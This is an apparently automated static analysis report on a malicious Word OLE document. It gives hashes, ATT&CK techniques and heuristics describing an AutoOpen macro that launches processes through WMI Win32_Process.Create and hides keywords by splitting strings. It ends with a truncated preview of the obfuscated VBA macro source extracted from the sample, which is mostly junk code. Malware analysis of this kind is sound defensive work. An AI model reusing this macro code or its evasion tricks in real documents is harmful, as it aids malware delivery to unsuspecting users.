Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 90c260b2469174d1…

MALICIOUS

Office (OLE)

Size: 189.0 KB
Created: 2019-04-16 07:52:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: ae371e5d507b6d56a2cedae7d4acf7f2
SHA-1: 0f494abea718c897e92226cac4826ca9a44f1955
SHA-256: 90c260b2469174d1c60fca12bc1a31728a1219a71c5f27a5b1cf21db2271f123
Risk Score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro with an autoopen subroutine, a common technique for executing code as soon as the document is opened. The macro uses GetObject and CreateObject to reach the WMI 'Win32_Process' class and calls its 'Create' method, which is how a macro starts an arbitrary command or a further process. The 'winmgmts' moniker is obfuscated by splitting it across several string literals so that no single literal contains the keyword, which further indicates malicious intent.

Heuristics (9)

  • ClamAV: Doc.Malware.00536d-6943632-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6943632-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                               | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29919 bytes
SHA-256: 5fbb47236ae0f54e833181206c69db291fc3c7461639b8b6aae16dd098abaab8

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "MG1AX1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "axoZwZ"
Attribute VB_Base = "0{C048E48B-2750-47EE-AD27-3D21AD99F581}{AC90A0B1-A6E9-49BA-ADE5-D67CF5FB9B4A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "JCZXQ4"
Attribute VB_Base = "0{8645C7D1-CB6E-4A8B-A8B4-B0066A491CFC}{C6B5E892-E6D6-42AD-9367-30CF0C3F8CBA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ow4UCA"
Sub autoopen()
   If NAc4AwAD = wAUGAA Then
      Select Case GQAAAwA
         Case 167068954
            CQkQUU = Rnd(RABDBw + 650495095 + 371117463 / wDQ1AAQA)
            zA1AA1Ax = CByte(rAUAUDo + 20487845 + fA1UXUDA + 505403680)
         Case 387900406
            T1k4Z1C = hXQAAc
            uoQQDUA = Tan(D_A1ZQUA - CSng(zDBBDA))
      End Select
End If
   If j_BBBAQ = aA_DAk Then
      Select Case EAwAXBQG
         Case 5402959
            zBAw4AAA = Rnd(WZDxCQQA + 676616036 + 512829881 / tZo4AA4)
            sDUAX_ = CByte(XDADBAwo + 138834269 + zCAAUD + 958147293)
         Case 571616047
            UAABABAA = EBowkDZA
            mkX1DwQA = Tan(Lo4BAA4Q - CSng(pwDZwA))
      End Select
End If
X14_BU1
   If BAZXBccA = nAQDAwA Then
      Select Case CAAUDx
         Case 943859877
            XCwUAxkZ = Rnd(KAAkBw + 544252862 + 395633711 / TXAUAc)
            aAAA4wD = CByte(CxQwkB + 155554610 + uw4XQAAk + 356396423)
         Case 238531479
            wDAQcwx = vAxCZUcx
            FDBDDxA = Tan(Y_okkQD - CSng(jADAAA))
      End Select
End If
   If uCBGA4Q = ADAUAoXA Then
      Select Case JAAAkDo
         Case 483674180
            I4wAwAAx = Rnd(LQABQA + 891862522 + 573333373 / pkCQZA)
            m1XkAU4U = CByte(aAUXAQA + 661755591 + Zc_1cZ + 94742458)
         Case 52062674
            o_AZ1ZB = lcDcQA
            jBA1BA = Tan(nAoAA4 - CSng(Z4ABwoAG))
      End Select
End If
End Sub

Attribute VB_Name = "SkcCADX"
Function X14_BU1()
On Error Resume Next
   If tZXkXA = uACBZGB Then
      Select Case R4xADQ
         Case 199961955
            N_ZZAA = Rnd(wB44BZ + 892411673 + 494534649 / m4UUDXk_)
            ZQAc4XA = CByte(UBAcAU + 5806753 + nDkAwA_ + 888489361)
         Case 284077123
            RUAZA4 = jcUAGU
            kA1UDCAU = Tan(IQGQUo - CSng(nxUQBB))
      End Select
End If
   If uAZAoAo = j4XQcwx Then
      Select Case j1XBc1Q
         Case 584221840
            LXBAGA = Rnd(so_BxC + 418538847 + 791559013 / TXXU4A)
            LAAw_1 = CByte(DkBQZ_UA + 163227692 + p1wAXkZX + 675427222)
         Case 980059429
            fDQBw4A = w1o1CU
            ZxwB1CBc = Tan(FCDXAw - CSng(lcA_QQ))
      End Select
End If
   If FADZwZ = KQBAocxA Then
      Select Case OkDkUDx
         Case 906361846
            UA1BUx = Rnd(PcoA_oA + 585722260 + 185414287 / tQoAkAD)
            RcZAA1UB = CByte(vBQAAA + 494558293 + XUAA4BAA + 498426341)
         Case 314639635
            QA_A1Z = I_XkAZ
            uAA44A = Tan(bDoQAAA - CSng(w4QDBA))
      End Select
End If
If 7926 < 83936 Then
PGGUUxA = vbFalse
   If MoCoXAGo = rAUAwU Then
      Select Case MoQBGA_
         Case 599929272
            wDA1_DDB = Rnd(VAQ11AD + 710572197 + 341868934 / hkxUACU)
            V4AACZ = CByte(JDUGGcX + 824028117 + doQAAAD + 295595727)
         Case 957124950
            hUCDxxA = SQABQc4U
            soUAAA = Tan(RZBABQC - CSng(W1ACDAAA))
      End Select
End If
   If VAZAUB = S1XQAAo Then
      Select Case qBCBAoAA
         Case 733598475
            JAwxAAx = Rnd(VxQcA
... (truncated)